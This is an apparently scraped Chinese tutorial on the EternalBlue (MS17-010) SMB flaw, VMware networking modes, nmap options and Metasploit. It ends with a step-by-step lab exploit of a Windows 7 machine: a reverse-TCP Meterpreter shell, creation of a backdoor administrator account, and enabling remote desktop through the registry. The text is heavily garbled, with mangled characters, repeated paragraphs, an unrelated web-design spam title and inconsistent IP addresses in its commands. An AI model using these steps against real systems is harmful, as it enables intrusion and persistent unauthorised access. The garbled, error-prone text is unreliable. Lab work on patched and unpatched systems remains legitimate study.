臨沂做網(wǎng)站電話信息發(fā)布平臺(tái)推廣有哪些
????????MS17-010是微軟于2017年3月發(fā)布的一個(gè)安全補(bǔ)丁,旨在修復(fù)Windows操作系統(tǒng)中的一個(gè)嚴(yán)重漏洞,該漏洞被稱(chēng)為“永恒之藍(lán)”(EternalBlue)。這個(gè)漏洞影響了Windows的Server Message Block(SMB)協(xié)議,允許攻擊者通過(guò)網(wǎng)絡(luò)遠(yuǎn)程執(zhí)行代碼。
漏洞背景
- CVE編號(hào):CVE-2017-0144
- 影響版本:Windows Vista、Windows 7、Windows 8、Windows 10、Windows Server 2008、Windows Server 2012、Windows Server 2016等多個(gè)版本。
- 攻擊方式:攻擊者可以利用此漏洞發(fā)送特制的請(qǐng)求到目標(biāo)計(jì)算機(jī)的SMB服務(wù),從而執(zhí)行惡意代碼,獲取系統(tǒng)權(quán)限。
影響
永恒之藍(lán)漏洞的嚴(yán)重性在于,它允許攻擊者在沒(méi)有用戶交互的情況下,通過(guò)網(wǎng)絡(luò)傳播惡意軟件。2017年5月,勒索病毒W(wǎng)annaCry利用此漏洞進(jìn)行傳播,導(dǎo)致全球范圍內(nèi)的大規(guī)模感染,影響了數(shù)十萬(wàn)臺(tái)計(jì)算機(jī)。
防護(hù)措施
- 安裝補(bǔ)丁:及時(shí)安裝微軟發(fā)布的MS17-010補(bǔ)丁,以修復(fù)該漏洞。
- 關(guān)閉SMBv1:如果不需要,可以考慮禁用SMBv1協(xié)議,以減少攻擊面。
- 網(wǎng)絡(luò)防護(hù):使用防火墻和入侵檢測(cè)系統(tǒng),限制對(duì)SMB端口(如445端口)的訪問(wèn)。
- 定期備份:定期備份重要數(shù)據(jù),以防止勒索軟件攻擊造成的數(shù)據(jù)丟失。
橋接模式
橋接模式就是將主機(jī)網(wǎng)卡與虛擬的網(wǎng)卡利用虛擬網(wǎng)橋進(jìn)行通信。類(lèi)似于把物理主機(jī)虛擬為一個(gè)交換機(jī),所有橋接設(shè)置的虛擬機(jī)連接到這個(gè)交換機(jī)的一個(gè)接口上,物理主機(jī)也同樣插在這個(gè)交換機(jī)當(dāng)中,所以所有橋接下的網(wǎng)卡與網(wǎng)卡都是交換模式的,相互可以訪問(wèn)而不干擾。在橋接模式下,虛擬機(jī)IP地址需要與主機(jī)在同一網(wǎng)段,如果需要聯(lián)網(wǎng),則網(wǎng)關(guān)與DNS需要與主機(jī)網(wǎng)卡一致。
橋接模式下的所有虛擬機(jī)都是和主機(jī)是在同一網(wǎng)段的,可以把它們看成是"平等"的關(guān)系,這就會(huì)帶來(lái)一些麻煩,比如192.168.1段下只有254個(gè)主機(jī)地址,所以橋接模式下虛擬機(jī)和物理的總數(shù)不能超過(guò)這個(gè)數(shù)字!
Nat模式
?
在NAT模式中,主機(jī)網(wǎng)卡直接與虛擬NAT設(shè)備相連,然后虛擬NAT設(shè)備與虛擬DHCP服務(wù)器一起連接在虛擬交換機(jī)VMnet8上,這樣就實(shí)現(xiàn)了虛擬機(jī)聯(lián)網(wǎng)。VMware Network Adapter VMnet8網(wǎng)卡是為了實(shí)現(xiàn)主機(jī)與虛擬機(jī)之間的通信。
可見(jiàn)NAT模式下主機(jī)更像是虛擬機(jī)們的"路由器",通過(guò)VMnet8虛擬網(wǎng)卡為虛擬機(jī)分發(fā)地址。所以虛擬機(jī)和主機(jī)不再同一網(wǎng)段下,可以理解為主機(jī)是虛擬機(jī)的"上級(jí)",這也就是為什么橋接模式?jīng)]有VMnet0這個(gè)虛擬網(wǎng)卡,因?yàn)闃蚪幽J较碌奶摂M機(jī)和主機(jī)是"平等"的,共用同一個(gè)路由器
VMnet8網(wǎng)卡的作用僅僅是主機(jī)與虛擬機(jī)之間的通信,訪問(wèn)外網(wǎng)是不通過(guò)VMnet8網(wǎng)卡的!NAT模式下的虛擬機(jī)時(shí)通過(guò)真實(shí)主機(jī)的ip訪問(wèn)外網(wǎng)
僅主機(jī)模式
僅主機(jī)模式可有看成是NAT模式去除了虛擬NAT設(shè)備,然后使用VMware Network Adapter VMnet1虛擬網(wǎng)卡連接VMnet1虛擬交換機(jī)來(lái)與虛擬機(jī)通信的,Host-Only模式將虛擬機(jī)與外網(wǎng)隔開(kāi),使得虛擬機(jī)成為一個(gè)獨(dú)立的系統(tǒng),只與主機(jī)相互通訊。
nmap使用:
????????Nmap(Network Mapper)是一款用于網(wǎng)絡(luò)發(fā)現(xiàn)和安全審計(jì)的開(kāi)源工具。它最初由 Gordon Lyon(也被稱(chēng)為 Fyodor Vaskovich)開(kāi)發(fā),是一款功能強(qiáng)大且廣泛使用的網(wǎng)絡(luò)掃描工具。Nmap 允許用戶在網(wǎng)絡(luò)上執(zhí)行主機(jī)發(fā)現(xiàn)、端口掃描、服務(wù)識(shí)別和版本檢測(cè)等操作,以幫助評(píng)估網(wǎng)絡(luò)的安全性、發(fā)現(xiàn)主機(jī)和服務(wù)、以及識(shí)別潛在的安全威脅。
nmap常用命令主機(jī)發(fā)現(xiàn) iR 隨機(jī)選擇目標(biāo)-iL 從文件中加載IP地址-sL 簡(jiǎn)單的掃描目標(biāo)-sn Ping掃描-禁用端口掃描-Pn 將所有主機(jī)視為在在線,跳過(guò)主機(jī)發(fā)現(xiàn)-PS[portlist] (TCP SYN ping) 需要root權(quán)限-PA[portlist] (TCP ACK ping)-PU[portlist] (UDP ping)-PY [portlist] (SCTP ping)-PE/PP/PM ICMP回顯,時(shí)間戳和網(wǎng)絡(luò)掩碼請(qǐng)求探測(cè)-PO[協(xié)議列表] IP協(xié)議Ping-n/-R 從不執(zhí)行DNS解析/始終解析[默認(rèn):有時(shí)]--dns-servers 指定自定義DNS服務(wù)器--system-dns 使用OS的dns服務(wù)器--traceroute 跟蹤到每個(gè)主機(jī)的躍點(diǎn)路徑掃描技術(shù)-sS 使用TCP的SYN進(jìn)行掃描-sT 使用TCP進(jìn)行掃描-sA 使用TCP的ACK進(jìn)行掃描-sU UDP掃描-sI Idle掃描-sF FIN掃描-b<FTP中繼主機(jī)> FTP反彈掃描端口規(guī)格和掃描順序-p 掃描指定端口--exclude-ports 從掃描中排除指定端口-f 快速模式-掃描比默認(rèn)掃描更少的端口-r 連續(xù)掃描端口-不隨機(jī)化--top-ports 掃描<number>最常用的端口服務(wù)/版本探測(cè)-sV 探測(cè)服務(wù)/版本信息--version-intensity 設(shè)置版本掃描強(qiáng)度(0-9)--version-all 嘗試每個(gè)強(qiáng)度探測(cè)--version-trace 顯示詳細(xì)的版本掃描活動(dòng)(用于調(diào)試)腳本掃描-SC 等效于 --script=defult--script = <lua scripts>,<lua scripts> 以逗號(hào)分隔的目錄,腳本文件或腳本類(lèi)別--script-args = <n1=v1, n2=v2> 為腳本提供參數(shù)--script-args-file=文件名 從文件名中加載腳本參數(shù)--script-trace 顯示發(fā)送和接受的所有數(shù)據(jù)--script-updatedb 更新腳本數(shù)據(jù)庫(kù)--script-help=<lua scripts> 顯示有關(guān)腳本的幫助操作系統(tǒng)檢測(cè)-o 啟用os檢測(cè)--osscan-limit 將os檢測(cè)限制為可能的目標(biāo)--osscan-guess 推測(cè)操作系統(tǒng)檢測(cè)結(jié)果時(shí)間和性能--host-timeout 設(shè)置超時(shí)時(shí)間--scan-delay 設(shè)置探測(cè)之間的時(shí)間間隔-T <0-5> 設(shè)置時(shí)間模板,值越小,IDS報(bào)警幾率越低防火墻/IDS規(guī)避和欺騙-f 報(bào)文分段-s 欺騙源地址-g 使用指定的本機(jī)端口--proxies <url,port> 使用HTTP/SOCK4代理-data<hex string> 想發(fā)送的數(shù)據(jù)包中追加自定義的負(fù)載--data-string 將自定義的ACSII字符串附加到發(fā)送數(shù)據(jù)包中 --data-length 發(fā)送數(shù)據(jù)包時(shí),附加隨機(jī)數(shù)據(jù)--spoof-mac MAC地址欺騙--badsum 發(fā)送帶有虛假TCP/UNP/STCP校驗(yàn)和的數(shù)據(jù)包輸出-oN 標(biāo)準(zhǔn)輸出-oX XMl輸出-oS script jlddi3-oG grepable-oA 同時(shí)輸出三種主要格式-v 信息詳細(xì)級(jí)別-d 調(diào)試級(jí)別--packet-trace 跟蹤發(fā)送和接收的報(bào)文--reason 顯示端口處于特殊狀態(tài)的原因--open 僅顯示開(kāi)放的端口雜項(xiàng)-6 啟動(dòng)Ipv6掃描-A 啟動(dòng)Os檢測(cè),版本檢測(cè),腳本掃描和traceroute-V 顯示版本號(hào)
網(wǎng)絡(luò)掃描神器:Nmap 保姆級(jí)教程(附鏈接)_虛擬機(jī)怎么安裝nmap-CSDN博客
MSF使用:
????????MSF使用詳解-安全客 - 安全資訊平臺(tái)
【工具使用】——Metasploit(MSF)使用詳解(超詳細(xì))-CSDN博客
msf使用詳解 · Drunkmars's Blog
????????Metasploit Framework(MSF)是一款開(kāi)源安全漏洞檢測(cè)工具,附帶數(shù)千個(gè)已知的軟件漏洞,并保持持續(xù)更新。Metasploit可以用來(lái)信息收集、漏洞探測(cè)、漏洞利用等滲透測(cè)試的全流程,被安全社區(qū)冠以“可以黑掉整個(gè)宇宙”之名。剛開(kāi)始的Metasploit是采用Perl語(yǔ)言編寫(xiě)的,但是再后來(lái)的新版中,改成了用Ruby語(yǔ)言編寫(xiě)的了。在kali中,自帶了Metasploit工具。我們接下來(lái)以大名鼎鼎的永恒之藍(lán)MS17_010漏洞為切入點(diǎn),講解MSF框架的使用。???
1.打開(kāi)msfconsole工具:kali終端輸入 msfconsole
2.搜索漏洞: search 漏洞名字
3.選擇相關(guān)模塊:use 模塊號(hào)
4.顯示出有效的攻擊載荷:show options
5.設(shè)置目標(biāo)ip:set rhosts 目標(biāo)ip
6.執(zhí)行攻擊:run 或 exploit
7.退出到msf:back
Metasploit
Metasploit Framework(MSF)是一款開(kāi)源安全漏洞檢測(cè)工具,附帶數(shù)千個(gè)已知的軟件漏洞,并保持持續(xù)更新。Metasploit可以用來(lái)信息收集、漏洞探測(cè)、漏洞利用等滲透測(cè)試的全流程,被安全社區(qū)冠以“可以黑掉整個(gè)宇宙”之名。剛開(kāi)始的Metasploit是采用Perl語(yǔ)言編寫(xiě)的,但是再后來(lái)的新版中,改成了用Ruby語(yǔ)言編寫(xiě)的了。在kali中,自帶了Metasploit工具。我們接下來(lái)以大名鼎鼎的永恒之藍(lán)MS17_010漏洞為切入點(diǎn),講解MSF框架的使用。
?
·? 進(jìn)入框架:msfconsole
·? 使用search命令查找相關(guān)漏洞: search ms17-010
·? 使用use進(jìn)入模塊: use exploit/windows/smb/ms17_010_eternalblue
·? 使用info查看模塊信息: info
·? 設(shè)置攻擊載荷:set payload windows/x64/meterpreter/reverse_tcp
·? 查看模塊需要配置的參數(shù):show options
·? 設(shè)置參數(shù):set RHOST 192.168.125.138
·? 攻擊:exploit / run
·? 后滲透階段
不同的攻擊用到的步驟也不一樣,這不是一成不變的,需要靈活使用。
我們也可以將攻擊代碼寫(xiě)入 configure.rc(只要是以 .rc 結(jié)尾的文件)配置文件中,然后使用命令msfconsole -r configure.rc 進(jìn)行自動(dòng)攻擊!
漏洞利用(exploit)
漏洞利用exploit,也就是我們常說(shuō)的 exp,他就是對(duì)漏洞進(jìn)行攻擊的代碼。
exploit漏洞利用模塊路徑:/usr/share/metasploit-framework/modules/exploits
這里面有針對(duì)不同平臺(tái)的 exploit 。
我們現(xiàn)在就進(jìn) windows 平臺(tái)看看,這里會(huì)列出針對(duì)windows平臺(tái)不同服務(wù)的漏洞利用
我們進(jìn)入smb服務(wù),這是windows中經(jīng)常爆出漏洞的服務(wù),比如我們的永恒之藍(lán)漏洞就在這里面。漏洞利用代碼是以 rb 結(jié)尾的文件,因?yàn)閙etasploit是用Ruby語(yǔ)言編寫(xiě)的。
攻擊載荷(payload)
payload模塊路徑:/usr/share/metasploit-framework/modules/payloads
Payload中包含攻擊進(jìn)入目標(biāo)主機(jī)后需要在遠(yuǎn)程系統(tǒng)中運(yùn)行的惡意代碼,而在Metasploit中Payload是一種特殊模塊,它們能夠以漏洞利用模塊運(yùn)行,并能夠利用目標(biāo)系統(tǒng)中的安全漏洞實(shí)施攻擊。簡(jiǎn)而言之,這種漏洞利用模塊可以訪問(wèn)目標(biāo)系統(tǒng),而其中的代碼定義了Payload在目標(biāo)系統(tǒng)中的行為。
Shellcode :Shellcode是payload中的精髓部分,在滲透攻擊時(shí)作為攻擊載荷運(yùn)行的一組機(jī)器指令。Shellcode通常用匯編語(yǔ)言編寫(xiě)。在大多數(shù)情況下,目標(biāo)系統(tǒng)執(zhí)行了shellcode這一組指令 之后,才會(huì)提供一個(gè)命令行shell。
Metasploit中的 Payload 模塊主要有以下三種類(lèi)型:
-Single
-Stager
-Stage
- ·? Single是一種完全獨(dú)立的Payload,而且使用起來(lái)就像運(yùn)行 calc.exe 一樣簡(jiǎn)單,例如添加一個(gè)系統(tǒng)用戶或刪除一份文件。由于Single Payload是完全獨(dú)立的,因此它們有可能會(huì)被類(lèi)似 netcat 這樣的非metasploit處理工具所捕捉到。
- ·? Stager這種Payload負(fù)責(zé)建立目標(biāo)用戶與攻擊者之間的網(wǎng)絡(luò)連接,并下載額外的組件或應(yīng)用程序。一種常見(jiàn)的Stager Payload就是reverse_tcp,它可以讓目標(biāo)系統(tǒng)與攻擊者建立一條tcp連接,讓目標(biāo)系統(tǒng)主動(dòng)連接我們的端口(反向連接)。另一種常見(jiàn)的是bind_tcp,它可以讓目標(biāo)系統(tǒng)開(kāi)啟一個(gè)tcp監(jiān)聽(tīng)器,而攻擊者隨時(shí)可以與目標(biāo)系統(tǒng)進(jìn)行通信(正向連接)。
- ·? Stage是Stager Payload下的一種Payload組件,這種Payload可以提供更加高級(jí)的功能,而且沒(méi)有大小限制。
在 Metasploit 中,我們可以通過(guò)Payload的名稱(chēng)和使用格式來(lái)推斷它的類(lèi)型:
Single Payload的格式為:<target>/ <single> 如:windows/powershell_bind_tcp
Stager/Stage Payload的格式為:<target>/ <stage> / <stager> 如:windows/meterpreter/reverse_tcp
當(dāng)我們?cè)贛etasploit中執(zhí)行 show payloads 命令之后,它會(huì)給我們顯示一個(gè)可使用的Payload列表:
在這個(gè)列表中,像 windows/powershell_bind_tcp 就是一個(gè)Single Payload,它不包含Stage Payload
而 windows/meterpreter/reverse_tcp 則由一個(gè)Stage Payload(meterpreter)和 一個(gè)Stager Payload(reverse_tcp)組成
Stager中幾種常見(jiàn)的payload
windows/meterpreter/bind_tcp #正向連接
windows/meterpreter/reverse_tcp #反向連接,常用
windows/meterpreter/reverse_http #通過(guò)監(jiān)聽(tīng)80端口反向連接
windows/meterpreter/reverse_https #通過(guò)監(jiān)聽(tīng)443端口反向連接正向連接使用場(chǎng)景:我們的攻擊機(jī)在內(nèi)網(wǎng)環(huán)境,被攻擊機(jī)是外網(wǎng)環(huán)境,由于被攻擊機(jī)無(wú)法主動(dòng)連接到我們的主機(jī),所以就必須我們主動(dòng)連接被攻擊機(jī)了。但是這里經(jīng)常遇到的問(wèn)題是,被攻擊機(jī)上開(kāi)了防火墻,只允許訪問(wèn)指定的端口,比如被攻擊機(jī)只對(duì)外開(kāi)放了80端口。那么,我們就只能設(shè)置正向連接80端口了,這里很有可能失敗,因?yàn)?0端口上的流量太多了反向連接使用場(chǎng)景:我們的主機(jī)和被攻擊機(jī)都是在外網(wǎng)或者都是在內(nèi)網(wǎng),這樣被攻擊機(jī)就能主動(dòng)連接到我們的主機(jī)了。如果是這樣的情況,建議使用反向連接,因?yàn)榉聪蜻B接的話,即使被攻擊機(jī)開(kāi)了防火墻也沒(méi)事,防火墻只是阻止進(jìn)入被攻擊機(jī)的流量,而不會(huì)阻止被攻擊機(jī)主動(dòng)向外連接的流量。反向連接80和443端口使用場(chǎng)景:被攻擊機(jī)能主動(dòng)連接到我們的主機(jī),還有就是被攻擊機(jī)的防火墻設(shè)置的特別嚴(yán)格,就連被攻擊機(jī)訪問(wèn)外部網(wǎng)絡(luò)的流量也進(jìn)行了嚴(yán)格的限制,只允許被攻擊機(jī)的80端口或443端口與外部通信
Meterpreter
Meterpreter屬于stage payload,在Metasploit Framework中,Meterpreter是一種后滲透工具,它屬于一種在運(yùn)行過(guò)程中可通過(guò)網(wǎng)絡(luò)進(jìn)行功能擴(kuò)展的動(dòng)態(tài)可擴(kuò)展型Payload。這種工具是基于“內(nèi)存DLL注入”理念實(shí)現(xiàn)的,它能夠通過(guò)創(chuàng)建一個(gè)新進(jìn)程并調(diào)用注入的DLL來(lái)讓目標(biāo)系統(tǒng)運(yùn)行注入的DLL文件。
Meterpreter是如何工作的?
首先目標(biāo)先要執(zhí)行初始的溢出漏洞會(huì)話連接,可能是 bind正向連接,或者反彈 reverse 連接。反射連接的時(shí)候加載dll鏈接文件,同時(shí)后臺(tái)悄悄處理 dll 文件。其次Meterpreter核心代碼初始化,通過(guò) socket套接字建立一個(gè)TLS/1.0加密隧道并發(fā)送GET請(qǐng)求給Metasploit服務(wù)端。Metasploit服務(wù)端收到這個(gè)GET請(qǐng)求后就配置相應(yīng)客戶端。最后,Meterpreter加載擴(kuò)展,所有的擴(kuò)展被加載都通過(guò)TLS/1.0進(jìn)行數(shù)據(jù)傳輸。
Meterpreter的特點(diǎn):
·? Meterpreter完全駐留在內(nèi)存,沒(méi)有寫(xiě)入到磁盤(pán)
·? Meterpreter注入的時(shí)候不會(huì)產(chǎn)生新的進(jìn)程,并可以很容易的移植到其它正在運(yùn)行的進(jìn)程
·? 默認(rèn)情況下, Meterpreter的通信是加密的,所以很安全
·? 擴(kuò)展性,許多新的特征模塊可以被加載。
我們?cè)谠O(shè)置 payloads 時(shí),可以將 payloads 設(shè)置為:windows/meterpreter/reverse_tcp ,然后獲得了 meterpreter> 之后我們就可以干很多事了!具體的做的事,在我們下面的后滲透階段都有講!
?
kali控制臺(tái)輸入:msfconsole 進(jìn)入metasploit框架
尋找MS17_010漏洞: search ms17_010
這里找到了兩個(gè)模塊,第一個(gè)輔助模塊是探測(cè)主機(jī)是否存在MS17_010漏洞,第二個(gè)是漏洞利用模塊,我們先探測(cè)哪些主機(jī)存在漏洞
Auxiliary輔助探測(cè)模塊
該模塊不會(huì)直接在攻擊機(jī)和靶機(jī)之間建立訪問(wèn),它們只負(fù)責(zé)執(zhí)行掃描,嗅探,指紋識(shí)別等相關(guān)功能以輔助滲透測(cè)試。
輸入命令:use auxiliary/scanner/smb/smb_ms17_010
查看這個(gè)模塊需要配置的信息:show options
RHOSTS 參數(shù)是要探測(cè)主機(jī)的ip或ip范圍,我們探測(cè)一個(gè)ip范圍內(nèi)的主機(jī)是否存在漏洞
輸入:set RHOSTS 192.168.125.125-129.168.125.140
輸入:exploit 攻擊,這里有+號(hào)的就是可能存在漏洞的主機(jī),這里有3個(gè)主機(jī)存在漏洞
Exploit漏洞利用模塊
然后我們就可以去利用漏洞攻擊了,選擇漏洞攻擊模塊: use exploit/windows/smb/ms17_010_eternalblue
查看這個(gè)漏洞的信息:info
查看可攻擊的系統(tǒng)平臺(tái),這個(gè)命令顯示該攻擊模塊針對(duì)哪些特定操作系統(tǒng)版本、語(yǔ)言版本的系統(tǒng):show targets
這里只有一個(gè),有些其他的漏洞模塊對(duì)操作系統(tǒng)的語(yǔ)言和版本要求的很?chē)?yán),比如MS08_067,這樣就要我們指定目標(biāo)系統(tǒng)的版本的。如果不設(shè)置的話,MSF會(huì)自動(dòng)幫我們判斷目標(biāo)操作系統(tǒng)的版本和語(yǔ)言(利用目標(biāo)系統(tǒng)的指紋特征)
Payload攻擊載荷模塊
攻擊載荷是我們期望在目標(biāo)系統(tǒng)在被滲透攻擊之后完成的實(shí)際攻擊功能的代碼,成功滲透目標(biāo)后,用于在目標(biāo)系統(tǒng)上運(yùn)行任意命令。
查看攻擊載荷:show payloads
該命令可以查看當(dāng)前漏洞利用模塊下可用的所有Payload
設(shè)置攻擊載荷:set payload windows/x64/meterpreter/reverse_tcp
查看模塊需要配置的參數(shù): show options
設(shè)置RHOST,也就是要攻擊主機(jī)的ip:set RHOST 192.168.125.138
設(shè)置LHOST,也就是我們主機(jī)的ip,用于接收從目標(biāo)機(jī)彈回來(lái)的shell:set LHOST 192.168.125.129
如果我們這里不設(shè)置lport的話,默認(rèn)是4444端口監(jiān)聽(tīng)
攻擊: exploit
后滲透階段
運(yùn)行了exploit命令之后,我們開(kāi)啟了一個(gè)reverse TCP監(jiān)聽(tīng)器來(lái)監(jiān)聽(tīng)本地的 4444 端口,即我(攻擊者)的本地主機(jī)地址(LHOST)和端口號(hào)(LPORT)。運(yùn)行成功之后,我們將會(huì)看到命令提示符 meterpreter > 出現(xiàn),我們輸入: shell 即可切換到目標(biāo)主機(jī)的windows shell,要想從目標(biāo)主機(jī)shell退出到 meterpreter ,我們只需輸入:exit
永恒之藍(lán)實(shí)驗(yàn)部分 :
??????? 在msf中利用ms17-010漏洞來(lái)攻擊系統(tǒng),以熟悉msf工具的使用。
復(fù)現(xiàn)環(huán)境
- 攻擊機(jī):kali,192.168.222.130
- 被攻擊機(jī):win7,192.168.222.132 關(guān)閉防火墻
?
?
?
相互ping一下,看看能不能ping通
在kali中使用nmap掃描win7,發(fā)現(xiàn)445端口開(kāi)放?
nmap
:調(diào)用 Nmap 工具。
192.168.222.132
:這是目標(biāo) IP 地址,表示你要掃描的設(shè)備。
-O
:這個(gè)選項(xiàng)用于啟用操作系統(tǒng)檢測(cè)。Nmap 會(huì)嘗試識(shí)別目標(biāo)設(shè)備所運(yùn)行的操作系統(tǒng)。
-sS
:這是一個(gè) TCP SYN 掃描,通常被稱(chēng)為“半開(kāi)放掃描”。Nmap 發(fā)送 SYN 數(shù)據(jù)包(連接請(qǐng)求),如果目標(biāo)主機(jī)響應(yīng) SYN-ACK,表示端口開(kāi)放;如果響應(yīng) RST,表示端口關(guān)閉。這種掃描方式相對(duì)隱蔽,不會(huì)建立完整的 TCP 連接。
-T4
:這個(gè)選項(xiàng)用于設(shè)置掃描速度和時(shí)間。Nmap 提供了多個(gè)時(shí)間模板(從 T0 到 T5),T4 表示“快速”,適合在網(wǎng)絡(luò)延遲較低的環(huán)境中使用,可以加快掃描速度,但可能會(huì)增加被防火墻或入侵檢測(cè)系統(tǒng)檢測(cè)到的風(fēng)險(xiǎn)。
在kali的終端中打開(kāi)msfconsole?
.利用search功能搜索ms17-010 搜索到兩個(gè)模塊
掃描模塊:auxiliary/admin/smb/ms17_010
攻擊模塊:exploit/windows/smb/ms17_010_eternalblue
使用 模塊3 對(duì)目標(biāo)主機(jī)進(jìn)行掃描,我們可以利用options先看一下選項(xiàng),發(fā)現(xiàn)存在,ms17-010
????????使用show options選項(xiàng),查看我們要輸入的具體參數(shù),其中標(biāo)注了yes的選項(xiàng)是必須的參數(shù),若這個(gè)參數(shù)為空,則需要我們填寫(xiě)。RHOSTS選項(xiàng)為空,所以我們需要填寫(xiě),RHOSTS代表要攻擊的目標(biāo)。輸入r然后按tab鍵可以。
????????設(shè)置RHOSTS,再run。
?進(jìn)行exp,使用模塊3,并查看選項(xiàng)
search 17-010
use 0
#設(shè)置payload連接的方式,reverse_tcp為反向連接,即受害機(jī)主動(dòng)連接攻擊機(jī),以獲取shell
set payload windows/x64/meterpreter/reverse_tcp
show options
set rhosts 192.168.222.130
?
看看配置文件
設(shè)置 rhosts:192.168.222.132
此處使用 set 命令,設(shè)置一下 RHOSTS
(靶機(jī)的ip地址)
“rhosts”這個(gè)詞在計(jì)算機(jī)安全和網(wǎng)絡(luò)配置中通常指“遠(yuǎn)程主機(jī)”(Remote Hosts).
set RHOSTS 192.168.222.132
運(yùn)行成功會(huì)出現(xiàn)meterpreter >
Meterpreter 是 Metasploit 的一個(gè)擴(kuò)展模塊,可以調(diào)用 Metasploit 的一些功能,
對(duì)目標(biāo)系統(tǒng)進(jìn)行更深入的滲透,如獲取屏幕、上傳/下載文件、創(chuàng)建持久后門(mén)等。
運(yùn)行成功后,就可遠(yuǎn)程命令執(zhí)行。
使用chcp 65001?解決亂碼問(wèn)題
?
創(chuàng)建新的管理員賬戶,賬戶名hacker,密碼12356(在shell控制臺(tái)下)
使用net localgroup administrators hacker /add命令,將賬戶設(shè)置為管理員
使用net localgroup administrators命令可查看本地管理員
利用netstat -ano查看3389端口是否開(kāi)啟,發(fā)現(xiàn)沒(méi)有開(kāi)啟
把3389端口打開(kāi)?
?REG?ADD?HKLM\SYSTEM\CurrentControlSet\Control\Terminal"?"Server?/v?fDenyTSConnections?/t?REG_DWORD?/d?00000000?/f?
REG ADD
:這是用于添加新項(xiàng)或修改現(xiàn)有項(xiàng)的命令。-
HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server
:HKLM
:代表 "HKEY_LOCAL_MACHINE",這是 Windows 注冊(cè)表中的一個(gè)根鍵,存儲(chǔ)了計(jì)算機(jī)的全局設(shè)置。SYSTEM\CurrentControlSet\Control\Terminal Server
:這是注冊(cè)表中的一個(gè)路徑,指向與終端服務(wù)相關(guān)的設(shè)置。
-
/v fDenyTSConnections
:/v
:指定要添加或修改的值的名稱(chēng)。fDenyTSConnections
:這是一個(gè)值名稱(chēng),用于控制遠(yuǎn)程桌面連接的設(shè)置。具體來(lái)說(shuō),它指定是否允許遠(yuǎn)程桌面連接。
-
/t REG_DWORD
:/t
:指定值的數(shù)據(jù)類(lèi)型。REG_DWORD
:表示這個(gè)值的數(shù)據(jù)類(lèi)型是一個(gè)雙字(DWORD),通常用于存儲(chǔ)整數(shù)值。
-
/d 00000000
:/d
:指定要設(shè)置的值的數(shù)據(jù)。00000000
:這是要設(shè)置的值,表示允許遠(yuǎn)程桌面連接。具體來(lái)說(shuō),0
(或?00000000
)表示不拒絕遠(yuǎn)程桌面連接。
-
/f
:/f
:表示強(qiáng)制執(zhí)行,不會(huì)詢問(wèn)確認(rèn)。如果沒(méi)有這個(gè)選項(xiàng),系統(tǒng)可能會(huì)提示用戶確認(rèn)修改操作。
?連接,rdesktop 192.168.222.132:3389
其他用戶
?可以用rdesktop登錄進(jìn)去